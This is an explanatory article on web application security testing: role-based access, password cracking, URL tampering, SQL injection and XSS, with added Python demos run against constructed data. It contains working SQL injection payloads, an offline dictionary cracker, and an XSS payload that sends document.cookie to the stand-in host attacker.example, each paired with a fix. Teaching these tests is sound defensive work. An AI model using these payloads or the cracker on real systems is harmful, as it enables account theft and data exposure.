The Internet has digitally connected the world and made distance largely irrelevant. The web has created countless opportunities for businesses to operate seamlessly, and online transactions are now routine. The result is a proliferation of business applications on the web, which raises concerns about their security: an information leak from any of these applications can expose sensitive data and harm individuals as well as organizations. Effective web application security testing is one way to mitigate such risks.
Security Testing
Security testing means testing a web application for vulnerabilities that could lead to unauthorised access. It also verifies that confidential data stays confidential and that each user can reach only the areas intended for that user. For example, a data entry operator at an airline reservation terminal should not be able to open the airline's management reports. Likewise, one user should not be able to deny service to other users or alter the behaviour of the application. Any loophole the tester finds during security testing that could be misused should therefore be recorded and fixed.
Web Application Security Testing draws on a number of techniques for finding weaknesses before an attacker does. The right approach is to apply the whole spectrum of testing methods shown below rather than rely on any single one.
1) Adherence to user-specific access: Any software system has areas that only particular users should be authorised to reach, and a user must not be able to get into areas outside that user's remit. To illustrate: a data entry operator in an airline reservation system should be able to enter passenger details only, and should never be able to see the forms, reports and database tables that concern the airline itself. Enforcing such user-specific access strengthens the security of a system.
To check compliance, the tester should create accounts or sessions for each role, then try to reach every user-specific area from every other role, and, within the same role, try to reach records that belong to other users. Any area reachable by 'others' is a finding: the tester should log it and make sure the access check is added on the server side, not merely by hiding a link in the menu.
2) Breaking passwords: User IDs and passwords are the usual way to log into a secured system; the password authenticates the user and, together with the user's role, determines what the user may access. Passwords should be stored only as salted hashes, never in a reversible form, but a weak password can still be guessed or recovered by an intruder running a cracker against the stored hashes or against the login form. The application should therefore enforce robust passwords (adequate length plus a combination of letters, numerals and special characters) and limit repeated login attempts. Web application testing should also include running password-cracker programs against test accounts. Moreover, the tester should check whether unencrypted passwords or usernames are stored in cookies, which is a real security issue.
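The following is an added example written for this page, not code from the original post. It covers the three checks above with constructed sample data: a strength policy, an offline dictionary attack against salted PBKDF2-HMAC-SHA256 hashes (showing that hashing alone does not rescue a weak password), and a scan of Set-Cookie headers for credentials stored in the clear. The wordlist, account names, passwords and cookie headers are all made up for the demo, and the policy thresholds are hypothetical.

```python
"""Password checks for a security test (added example, not code from the original post).

Covers three points with constructed sample data: a strength policy, an offline
dictionary attack against salted PBKDF2 hashes, and a scan of Set-Cookie headers
for credentials stored in the clear. Wordlist, accounts and headers are made up.
"""
import hashlib
import os
import re
import string

ITERATIONS = 20_000   # deliberately low so the demo runs quickly; use far more in production

def policy_ok(password, min_len=12):
    """Hypothetical policy: minimum length plus letters, digits and special characters."""
    return (len(password) >= min_len
            and any(c.isalpha() for c in password)
            and any(c.isdigit() for c in password)
            and any(c in string.punctuation for c in password))

def store_password(password, salt=None):
    """Store (salt, PBKDF2-HMAC-SHA256 digest); the password itself is never kept."""
    salt = salt if salt is not None else os.urandom(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)

def crack(salt, digest, wordlist):
    """Offline dictionary attack with a few common mutations per word."""
    for word in wordlist:
        for cand in (word, word.capitalize(), word + "1", word + "123", word + "!"):
            if hashlib.pbkdf2_hmac("sha256", cand.encode(), salt, ITERATIONS) == digest:
                return cand
    return None

# Constructed wordlist of the kind a cracker carries
WORDLIST = ["password", "airline", "welcome", "reservation"]

def audit_accounts(accounts):
    """accounts: {username: password the user chose}.
    Hashes each one the way the application would, then returns the usernames
    whose hash the dictionary attack recovers."""
    weak = []
    for user, pw in accounts.items():
        salt, digest = store_password(pw)
        if crack(salt, digest, WORDLIST) is not None:
            weak.append(user)
    return weak

# Cookie names that suggest a credential has been written into the cookie jar
COOKIE_CRED = re.compile(r"(?i)\b(pass(?:word)?|pwd|user(?:name)?|login)=([^;]*)")

def cookie_leaks(set_cookie_headers):
    """Return name=value pairs from Set-Cookie headers that look like credentials in the clear."""
    leaks = []
    for header in set_cookie_headers:
        m = COOKIE_CRED.search(header)
        if m:
            leaks.append(m.group(0))
    return leaks

if __name__ == "__main__":
    print("fails policy:", [p for p in ("airline123", "Tr0ub4dor&3x!") if not policy_ok(p)])
    print("cracked accounts:", audit_accounts({"alice": "airline123", "bob": "Tr0ub4dor&3x!"}))
    print("cookie leaks:", cookie_leaks([
        "sessionid=9f2c1a; Path=/; HttpOnly; Secure",
        "username=alice; Path=/",
        "password=airline123; Path=/",
    ]))
```

The cracker runs against hashes the tester obtained legitimately (a test database or a copy of the user store provided for the engagement); against a live login form the same wordlist is used far more slowly, and a lockout or rate limit should stop it, which is itself worth checking.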
3) Check the URLs: Attackers commonly use HTTP GET requests to extract information from a web application by altering the parameters in the query string, for example changing a record id or a role value in the URL. The tester should use the same technique to find out whether the application accepts such tampered queries, and any gaps found should be fixed on the server side so that intruders are deterred.
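The sweep described under items 1 and 3, as an added example written for this page rather than code from the original post. A tiny in-memory stand-in for an airline reservation application is constructed here so the check runs offline; its users, bookings, paths and policy matrix are all hypothetical. The stand-in has two deliberate bugs of the kind both items warn about: the /reports handler relies on the menu hiding the link from operators instead of checking the role, and /booking?id=... never checks that the booking belongs to the requesting user. The same handler with hardened=True adds the missing server-side checks.

```python
"""Access-control sweep: user-specific areas (item 1) and URL parameter tampering (item 3).

Added example, not code from the original post. The application, users, bookings
and policy matrix below are constructed for the demo.
"""
from itertools import product

# Constructed sample data
USERS = {
    "operator_a": {"role": "operator"},
    "operator_b": {"role": "operator"},
    "manager":    {"role": "manager"},
}
BOOKINGS = {
    101: {"owner": "operator_a", "passenger": "A. Singh"},
    102: {"owner": "operator_b", "passenger": "B. Khan"},
}

def handle_request(user, path, params, hardened=False):
    """Hypothetical server-side handler. Returns (status, body).
    hardened=False reproduces the bugs; hardened=True adds the missing checks."""
    role = USERS[user]["role"]
    if path == "/booking/new":
        return 200, "passenger entry form"
    if path == "/reports":
        if hardened and role != "manager":
            return 403, ""
        return 200, "revenue report"          # BUG: only the menu link was hidden
    if path == "/booking":
        booking = BOOKINGS.get(int(params.get("id", 0)))
        if booking is None:
            return 404, ""
        if hardened and booking["owner"] != user and role != "manager":
            return 403, ""
        return 200, booking["passenger"]      # BUG: any login can read any id
    return 404, ""

# Hypothetical policy matrix: the status each role is meant to get for each page
EXPECTED = {
    ("operator", "/booking/new"): 200,
    ("operator", "/reports"):     403,
    ("manager",  "/booking/new"): 200,
    ("manager",  "/reports"):     200,
}

def sweep_roles(hardened=False):
    """Item 1: log in as every user, request every page, compare with the matrix."""
    findings = []
    for (role, path), want in EXPECTED.items():
        for user, info in USERS.items():
            if info["role"] != role:
                continue
            got, _ = handle_request(user, path, {}, hardened)
            if got != want:
                findings.append(f"{user} ({role}) {path}: expected {want}, got {got}")
    return findings

def sweep_ids(hardened=False):
    """Item 3: alter the id in the query string as each user; flag reads of others' records."""
    findings = []
    for user, bid in product(USERS, BOOKINGS):
        status, _ = handle_request(user, "/booking", {"id": str(bid)}, hardened)
        owner = BOOKINGS[bid]["owner"]
        allowed = owner == user or USERS[user]["role"] == "manager"
        if status == 200 and not allowed:
            findings.append(f"{user} read /booking?id={bid} owned by {owner}")
    return findings

if __name__ == "__main__":
    for finding in sweep_roles() + sweep_ids():
        print("FINDING:", finding)
    print("after server-side checks:", sweep_roles(hardened=True) + sweep_ids(hardened=True))
```

Against a real application the handler call becomes an HTTP request made with each role's session cookie; the structure of the sweep, every role against every page and every id, is what matters, because the bug is invisible from any single user's point of view.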
4) SQL queries: Attackers can steal vital information from the database server by submitting SQL fragments through user input fields (SQL injection). The primary defence is to build every query with parameterised statements so that user input is never spliced into the SQL text; the tester should submit a single quotation mark (') and classic injection payloads in every field and watch for database errors or unexpected results. Constraining input is a useful secondary measure: field lengths should be predefined (a surname field might allow a maximum of 25 characters instead of 150) and fields should reject characters and script fragments they have no business accepting, but length limits and character blacklists on their own do not stop injection, and blocking the apostrophe breaks legitimate names.
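An added example, not code from the original post, showing the vulnerable lookup beside its parameterised form. It uses an in-memory SQLite database with constructed passenger rows so it runs offline; the table, column names and payloads are hypothetical. It also shows why the 25-character cap mentioned above is not a defence on its own: the classic payloads are shorter than that.

```python
"""SQL injection: a vulnerable lookup beside its parameterised form
(added example, not code from the original post). In-memory SQLite with
constructed rows; table, columns and payloads are hypothetical.
"""
import sqlite3

def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE passengers (surname TEXT, pnr TEXT, card_last4 TEXT)")
    db.executemany("INSERT INTO passengers VALUES (?, ?, ?)", [
        ("Singh", "ABC123", "4242"),
        ("Khan", "XYZ789", "1111"),
        ("Lee", "QRS456", "9999"),
        ("O'Brien", "LMN000", "0000"),   # a legitimate surname containing a quote
    ])
    return db

def lookup_vulnerable(db, surname):
    """Input is spliced into the SQL text, so it can change the query's meaning."""
    sql = "SELECT surname, pnr FROM passengers WHERE surname = '" + surname + "'"
    return db.execute(sql).fetchall()

def lookup_truncated(db, surname, max_len=25):
    """The length limit alone, applied to the vulnerable query: still injectable."""
    return lookup_vulnerable(db, surname[:max_len])

def lookup_safe(db, surname):
    """Placeholder binding: the driver passes the value separately from the SQL,
    so a quote in the input is just a character in a surname."""
    return db.execute(
        "SELECT surname, pnr FROM passengers WHERE surname = ?", (surname,)
    ).fetchall()

def apostrophe_breaks_vulnerable(db):
    """True if an ordinary surname with an apostrophe crashes the concatenated query."""
    try:
        lookup_vulnerable(db, "O'Brien")
        return False
    except sqlite3.OperationalError:
        return True

# Classic payloads a tester would type into the surname field
TAUTOLOGY = "' OR '1'='1"                                            # 11 characters
UNION_DUMP = "x' UNION SELECT surname, card_last4 FROM passengers --"  # pulls another column

if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, TAUTOLOGY))      # every row, not one surname
    print(lookup_truncated(db, TAUTOLOGY))       # the 25-char cap changes nothing
    print(lookup_vulnerable(db, UNION_DUMP))     # card digits leak through the pnr column
    print(lookup_safe(db, TAUTOLOGY))            # []: no surname equals the payload literally
    print(lookup_safe(db, "O'Brien"))            # the real O'Brien is found
    print(apostrophe_breaks_vulnerable(db))      # True: concatenation fails on legitimate input
```

The tester's signal is the difference between the two forms: when a quote in a field produces a database error, or a tautology returns more rows than one surname should, the field is concatenating input into SQL and needs to move to placeholders.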
5) Cross-site scripting (XSS): This attack injects HTML or JavaScript into the application so that it runs in other users' browsers, most often to steal session cookies. (The abbreviation XSS is used rather than CSS to avoid confusion with Cascading Style Sheets.) As part of the web application security testing process the tester should submit script payloads into every input field and URL parameter and confirm that the application does not reflect or store them as live markup: output must be encoded for the context in which it is rendered, session cookies should carry the HttpOnly flag so script cannot read them, and input field lengths should remain well defined.
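An added example, not code from the original post, showing a page fragment rendered with and without output encoding and the check a tester would run over the response. The responses are built as strings so it runs offline; the payloads, field names, attacker host and cookie header are constructed. It goes slightly beyond the text by covering an attribute context as well as plain text, since a payload that is harmless in one is live in the other.

```python
"""Reflected XSS: rendering untrusted input with and without output encoding
(added example, not code from the original post). Responses are built as strings;
payloads, field names, attacker host and cookie header are constructed.
"""
import html

# Payloads a tester might submit: one for an element's text, one for an attribute value
SCRIPT_PAYLOAD = "<script>new Image().src='https://attacker.example/c?'+document.cookie</script>"
ATTR_PAYLOAD = '" autofocus onfocus="alert(document.cookie)'

def render_vulnerable(name, query):
    """Untrusted values are concatenated straight into the HTML."""
    return ('<p>Welcome back, ' + name + '</p>\n'
            '<input name="q" value="' + query + '">')

def render_escaped(name, query):
    """html.escape(quote=True) turns & < > " ' into entities, so the browser treats
    the values as text in both the element and the attribute context."""
    return ('<p>Welcome back, ' + html.escape(name, quote=True) + '</p>\n'
            '<input name="q" value="' + html.escape(query, quote=True) + '">')

def reflected_unencoded(response, payloads):
    """Tester's check: which payloads come back verbatim, i.e. as live markup?"""
    return [p for p in payloads if p in response]

def session_cookie_ok(set_cookie):
    """A session cookie that document.cookie cannot read needs the HttpOnly flag."""
    flags = [part.strip().lower() for part in set_cookie.split(";")[1:]]
    return "httponly" in flags

if __name__ == "__main__":
    payloads = [SCRIPT_PAYLOAD, ATTR_PAYLOAD]
    print("vulnerable reflects:", reflected_unencoded(render_vulnerable(*payloads), payloads))
    print("escaped reflects:   ", reflected_unencoded(render_escaped(*payloads), payloads))
    print(render_escaped(*payloads))
    print("cookie protected:", session_cookie_ok("sessionid=9f2c1a; Path=/; Secure; HttpOnly"))
```

Encoding must match the context: the same entity escaping that neutralises both payloads here would not be enough inside a JavaScript block or a URL attribute, so the tester should try each place a value is echoed, not just the first one found.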

IAST security is best used in conjunction with other testing technologies. An effective application security solution will not rely on a single testing technology.